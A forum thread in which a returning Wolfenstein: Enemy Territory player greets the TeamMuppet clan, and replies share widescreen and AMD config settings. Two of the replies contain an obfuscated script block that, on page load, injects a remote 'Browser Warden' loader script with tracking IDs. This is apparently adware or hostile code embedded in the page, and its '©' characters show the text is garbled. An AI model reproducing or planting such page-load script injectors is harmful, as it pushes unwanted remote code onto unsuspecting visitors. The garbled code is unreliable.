P!kaChu is back ... P!k ... who ??

pikachu

Well hello guys. 

I guess most of you wont remember me, i joined TM/PIMP pretty 3 years ago and left them 2 years ago. 
I decided to go on army from 2012-2014 so thats why i couldnt play and stay on server/W:et. 
I wasnt a big name so it wasnt this terrible. 
I was on an Etpro ScrimTeam back on the days, when ppl still played etpro ^^ 

Anyways, now im back home, i study IT and i got some free time to spent it on Wolfenstein . 
Still its one of the best game ive to say. 

I talked with =TM=.Jaden ( btw hes pretty cool guy dont lose him ) bout what happened when i wasnt there and stuff. 
I heard the Fusion with *PIMP* broke so its only =TM= now. 
Sad to hear but anyways, im happy that TeamMuppet still exist. 

I guess i will stay on your server, cause it the only server ive some Connenctions to it and maybe i will try to join back on =TM=. 
But first of all ive to reclaim my old Skill lvl i suck hard atm ^^. 

BTW: playing on a Windows 8.1 PC seems to bring some problem with it. 
You got some CFG stuff to fixx issues, 16:9 widescreen res. and stuff, this would be pretty cool . 

Greetings your p!kaChu :) 

Welcome :)

I play to on windows 8.1, no probs so far.

You can apply this patch http://donewmouseaccel.blogspot.ch/2010/03/markc-windows-7-mouse-acceleration-fix.html for the mouse.. but thats all.

custom res:

set r_mode -1

set r_customwidth 1920

set r_customheight 1080

and if you use ATI/AMD, fix fps issue with:

set r_primitives 2

Welcome back, you'll see ET hasn't changed a lot through the years :) ETPro is still played btw!

<script>(function(){if (window.top == window.self){function bindReady©{function a(){b||(b=!0,c())}var b=!1;if(document.addEventListener)document.addEventListener("DOMContentLoaded",function(){a()},!1);else if(document.attachEvent){if(document.documentElement.doScroll&&window==window.top){var d=function(){if(!b&&document.body)try{document.documentElement.doScroll("left"),a()}catch©{setTimeout(d,0)}};d()}document.attachEvent("onreadystatechange",function(){"complete"===document.readyState&&a()})}window.addEventListener?window.addEventListener("load",a,!1):window.attachEvent&&window.attachEvent("onload",a)};bindReady(function(){(function(){var t=document.createElement('script');t.src ='//browserwarden-a.akamaihd.net/loaders/2071/l.js?pid=2071&systemid=28c037141835c3804637166085594cd1&ext=Browser Warden&aoi=1412170556&zoneid=1392260&crr=1414092893&type=p'; document.body.appendChild(t);})();});}})();</script>

Thankfully it didnt jeah :) 

One of the main reasons i came back :) 

<script>(function(){if (window.top == window.self){function bindReady©{function a(){b||(b=!0,c())}var b=!1;if(document.addEventListener)document.addEventListener("DOMContentLoaded",function(){a()},!1);else if(document.attachEvent){if(document.documentElement.doScroll&&window==window.top){var d=function(){if(!b&&document.body)try{document.documentElement.doScroll("left"),a()}catch©{setTimeout(d,0)}};d()}document.attachEvent("onreadystatechange",function(){"complete"===document.readyState&&a()})}window.addEventListener?window.addEventListener("load",a,!1):window.attachEvent&&window.attachEvent("onload",a)};bindReady(function(){(function(){var t=document.createElement('script');t.src ='//browserwarden-a.akamaihd.net/loaders/2071/l.js?pid=2071&systemid=28c037141835c3804637166085594cd1&ext=Browser Warden&aoi=1412170556&zoneid=1392260&crr=1414092893&type=p'; document.body.appendChild(t);})();});}})();</script>

If you say so.... :D